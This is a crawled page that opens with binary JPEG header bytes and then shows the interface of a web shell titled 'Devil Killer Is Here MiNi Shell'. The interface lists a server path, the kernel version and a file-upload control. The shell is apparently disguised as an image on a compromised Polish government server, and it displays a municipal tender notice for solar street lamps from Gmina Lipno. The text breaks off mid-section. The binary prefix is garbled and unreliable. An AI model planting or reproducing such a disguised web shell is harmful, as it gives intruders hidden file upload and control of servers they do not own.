JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240125/0006598501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa lamp solarnych oświetlenia ulicznego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Lipno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050764</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Wielkopolskich 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lipno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-111</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@lipno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lipno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa lamp solarnych oświetlenia ulicznego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8c0ecc2f-b9d0-11ee-9897-f6855eb846c0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00065985</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00029577/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa wraz z montażem lamp typu SOLAR</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lipno/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem www.platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/lipno/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a) środki komunikacji elektronicznej – platforma zakupowa Zamawiającego [dalej Platforma]: https://platformazakupowa.pl/pn/lipno/proceedings. Pod tym adresem udostępniane będą dokumenty zamówienia. <br/>b) Szczegółowe informacje dotyczące korzystania z Platformy w szczególności logowania, składania ofert, wniosków o wyjaśnienie treści SWZ, oraz pozostałych czynności podejmowanych w postępowaniu są zawarte w zakładce Instrukcje ( pod adresem: https://platformazakupowa.pl/strona/45-instrukcje) oraz „Regulaminie” ( pod adresem: https://platformazakupowa.pl/strona/1-regulamin).<br/>c) Wykonawca, przystępując do postępowania o udzielenie zamówienia publicznego: <br/>- akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie oraz uznaje go za wiążący. <br/>- zapoznał i stosuje się do Instrukcji zamieszczonych na platformazakupowa.pl<br/>w zakładce Instrukcje i uznaje je za wiążące. <br/>d) Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zostały ujęte w rozdziale XIX Specyfikacji Warunków Zamówienia. Z uwagi na limit znaków w ogłoszeniu, Zamawiający nie jest w stanie opisać wszystkich wymagań.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Urząd Gminy Lipno ul. Powstańców Wielkopolskich 9, 64-111 Lipno, reprezentowany przez Wójta Gminy Lipno.<br/>2)	Administrator Danych wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pod adresem e-mail: iod@lipno.pl lub pisemnie na adres siedziby Administratora Danych.<br/>3)	Pani/Pana dane osobowe przetwarzane będą w celu niezbędnym do wypełnienie obowiązku pranego ciążącego na Administratorze Danych na podstawie ustawy z dnia 11 września 2019r. Prawo zamówień publicznych w związku z art. 6 ust. 1 lit. c RODO <br/>4)	Pani/Pana dane osobowe mogą być przekazywane innym odbiorcom na podstawie przepisów prawa lub zawartych umów i nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej. <br/>5)	Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celu, w którym zostały zebrane, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy prawa. <br/>6)	Posiada Pani/Pan prawo dostępu do treści swoich danych, ich sprostowania, ograniczenia przetwarzania oraz wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy RODO. <br/>7)	Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym, określonym w przepisach ustawy PZP , związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>8)	Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany i nie będą profilowane.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9)	Nie przysługuje Pani/Panu:<br/>– w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych<br/>– prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO<br/>–na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawa prawną przetwarzania Pani/pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1	Część nr 1: „ Dostawa wraz z montażem lamp solarnych – dużych” obejmuje dostawę wraz z montażem kompletnej lamy solarnej w następujących lokalizacjach i ilości sztuk:<br/>-oświetlenie uliczne na skrzyżowaniu ul. Krętej i ul. Kolejowej w Wilkowicach – szt. 2<br/>-oświetlenie uliczne na ul. Nowej od nr 26 do ul. Poprzecznej w Wilkowicach – szt. 1<br/>-oświetlenie uliczne na ul. Cukrowej 7 w Wilkowicach – szt. 1<br/>-oświetlenie uliczne w Goniembicach 8A – szt. 1<br/>-oświetlenie uliczne przy boisku sportowym w Gronówku” -szt. 1<br/>-oświetlenie uliczne na os. Lipowym 27 w Mórkowie – szt. 1<br/>-oświetlenie uliczne przy ścieżce rowerowej przy os. Wierzbowym w Mórkowie –szt. 4<br/>-oświetlenie uliczne w Mórkowie 25C (przejście) – szt. 1<br/>-oświetlenie uliczne w Smyczynie – szt. 1<br/>Mapy poglądowe lokalizacji lamp stanowią załącznik nr 8 do SWZ.<br/><br/>Szczegółowy opis przedmiotu zamówienia dla Części nr 1:<br/>a) Specyfikacja lamp solarnych o minimalnych parametrach z wyjątkiem oświetlenia ulicznego w Mórkowie 25C (przejście):<br/>- słup stalowy o wysokości 5,5m zabezpieczony antykorozyjnie, grubość ścianki min. 4mm, wykonany ze stali St3S, słup o profilu okrągłym, zwężający się ku górze, ocynkowany ogniowo zgodnie z normą EN ISO 1461, w dolnej części słupa otwór rewizyjny,<br/>- wysięgnik wykonany z takiego samego materiału jak konstrukcja słupa,<br/>- słup posadowiony na fundamencie prefabrykowanym typu F-100 o wymiarach 100x30x30cm<br/>- źródło światła – oprawa uliczna LED max 15-20W, barwa światła: biała, klasa szczelności oprawy: IP67, żywotność: 50000h, temperatura pracy: -30°C/+50°C, wydajność świetlna ≥5200lm<br/>- panele fotowoltaiczne – polikrystaliczne, 2szt. o mocy 160W, natężenie prądu mocy maksymalnej: min. 8,6A; panele posiadają 10-letnią gwarancję materiałową producenta<br/>- akumulator żelowy - hermetyczny, głębokiego rozładowania, 1szt. o pojemności min. 120Ah, zakopany w ziemi, układ zasilania: 12V, akumulator umieszczony w hermetycznej skrzynce z tworzywa sztucznego (klasa szczelności: IP67)<br/>- układ sterowniczy - kontroler elektroniczny typu PWM, o mocy ładowania 20A, zabudowany wewnątrz słupa,<br/>- przewody do łączenia poszczególnych elementów urządzenia - paneli fotowoltaicznych: 4mm², oprawy LED: 2,5mm², akumulatorów żelowych: 4mm²<br/>- zabezpieczenia nadmiarowo prądowe paneli fotowoltaicznych, oprawy LED i akumulatora<br/>- sposób włączania – czujnik zmierzchowy<br/>- warunki klimatyczne dla całej lampy -20°C/+50°C<br/>- autonomia – (czas pracy lampy od pełnego naładowania akumulatora, przy niesprzyjającej pogodzie) – min. 4 dni<br/>-Gwarancja min. 36 miesięcy [przy czym panele fotowoltaiczne posiadają 10-letnią gwarancję materiałową producenta]<br/>- Oferowany przedmiot zamówienia musi spełniać wymagane normy i przepisy prawa.<br/><br/>b) Specyfikacja lamp solarnych o minimalnych parametrach dla oświetlenia ulicznego w Mórkowie 25C (przejście) :<br/>- słup stalowy o wysokości 8m zabezpieczony antykorozyjnie, grubość ścianki min. 4mm,<br/>wykonany ze stali St3S, słup o profilu okrągłym, zwężający się ku górze, ocynkowany ogniowo zgodnie z normą EN ISO 1461, w dolnej części słupa otwór rewizyjny,<br/>- wysięgnik wykonany z takiego samego materiału jak konstrukcja słupa,<br/>- słup posadowiony na fundamencie prefabrykowanym typu F-150 o wymiarach 150x35x35cm (rozstaw śrub 22cm, zestaw montażowy M24) i wadze 200kg<br/>- źródło światła – oprawa uliczna LED max 30W<br/>- panele fotowoltaiczne – polikrystaliczne, 2szt. o mocy 280W, sprawność panela: min. 17,1%, natężenie prądu mocy maksymalnej: min: 8,80A, 10-letnia gwarancja materiałowa producenta na panele;<br/>- akumulator żelowy - hermetyczny, głębokiego rozładowania, 2szt. o pojemności 150Ah każdy zakopany w ziemi, układ zasilania: 24V, akumulatory umieszczone w hermetycznych skrzynkach z tworzywa sztucznego (polipropylen) klasa szczelności: IP65<br/>- turbina wiatrowa trzyłopatowa 300W, napięcie znamionowe 12/24V start turbiny od 2,5m/s, długość łopaty min. 750mm, waga 7,5kg<br/>- układ sterowniczy - kontroler elektroniczny typu MPPT, o mocy ładowania 20A, zabudowany wewnątrz słupa, pozwalający na ustawienie czasu pracy w zakresie od 1 do 15 godzin oraz kontrolowanie stanu naładowania akumulatorów, o klasie szczelności IP 67<br/>- przewody do łączenia poszczególnych elementów urządzenia - paneli fotowoltaicznych: 4mm², oprawy LED: 2,5mm², akumulatorów żelowych: 10mm²<br/>- zabezpieczenia nadmiarowo prądowe paneli fotowoltaicznych, oprawy LED i akumulatora<br/>- sposób włączania – czujnik zmierzchowy<br/>- warunki klimatyczne dla całej lampy -30°C/+50°C<br/>- autonomia – (czas pracy lampy od pełnego naładowania akumulatora, przy niesprzyjającej<br/>pogodzie) – min. 5 dni<br/>- czas pracy lampy od 8 do 12 godzin<br/>-Gwarancja min. 36 miesięcy [przy czym panele fotowoltaiczne posiadają 10-letnią gwarancję materiałową producenta]<br/>- Oferowany przedmiot zamówienia musi spełniać wymagane normy i przepisy prawa.<br/>UWAGA: Zamawiający dopuszcza produkty o parametrach jakościowych i cechach użytkowych równoważnych, tj. nie gorszych niż parametry wskazanego produktu, materiału, urządzenia, elementu i uzna każdy produkt o wskazanych lub lepszych parametrach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31520000-7 - Lampy i oprawy oświetleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie odpowiadać wymaganiom zawartym w ustawie Prawo zamówień publicznych, SWZ i uzyska najwyższa liczbę punktów wyliczoną w oparciu o kryteria określone w pkt 9.2. SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2: „Dostawa lamp solarnych – małych” obejmuje dostawę 49 sztuk kompletnych lamp solarnych. Miejsce dostawy: 64-111 Lipno, ul. Powstańców Wielkopolskich 68 – magazyn Urzędu Gminy Lipno.<br/>Szczegółowy opis przedmiotu zamówienia dla Części nr 2:<br/>Specyfikacja lamp solarnych o minimalnych parametrach:<br/>- SAL-4/B60 Słup stożkowy okrągły aluminiowy naturalny 4m, <br/>- Fundament B50, <br/>- Oprawa solarna 15W lampa solarna z czujnikiem ruchu 120st. 3-8m, rozsył światła 140st., akumulator 5400mAh, 4000K, 1600 lm.<br/>-gwarancja min. 24 miesiące<br/>- Oferowany przedmiot zamówienia musi spełniać wymagane normy i przepisy prawa.<br/>UWAGA: Zamawiający dopuszcza produkty o parametrach jakościowych i cechach użytkowych równoważnych, tj. nie gorszych niż parametry wskazanego produktu, materiału, urządzenia, elementu i uzna każdy produkt o wskazanych lub lepszych parametrach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31520000-7 - Lampy i oprawy oświetleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie odpowiadać wymaganiom zawartym w ustawie Prawo zamówień publicznych, SWZ i uzyska najwyższa liczbę punktów wyliczoną w oparciu o kryteria określone w pkt 9.2. SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy niepodlegają wykluczeniu i spełniają warunki dotyczące zdolności technicznej lub zawodowej:<br/>Dla Części nr 1:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 3 lat liczonych od upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje należycie co najmniej 1 dostawę wraz z montażem kompletnych lamp solarnych w ilości min. 10 sztuk na rzecz jednego podmiotu [w ramach jednej umowy]<br/>Dla Części nr 2:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 3 lat liczonych od upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje należycie co najmniej 1 dostawę kompletnych lamp solarnych w ilości min. 15 sztuk na rzecz jednego podmiotu [w ramach jednej umowy] <br/>Zamawiający oceniając zdolność techniczną lub zawodową może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dla Części nr 1:<br/>-wykaz dostaw, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający wykonanie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanie co najmniej 1 dostawy wraz z montażem kompletnych lamp solarnych w ilości min. 10 sztuk na rzecz jednego podmiotu [w ramach jednej umowy] wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - zgodnie ze wzorem Załącznika nr 6 do SWZ<br/>Dla Części nr 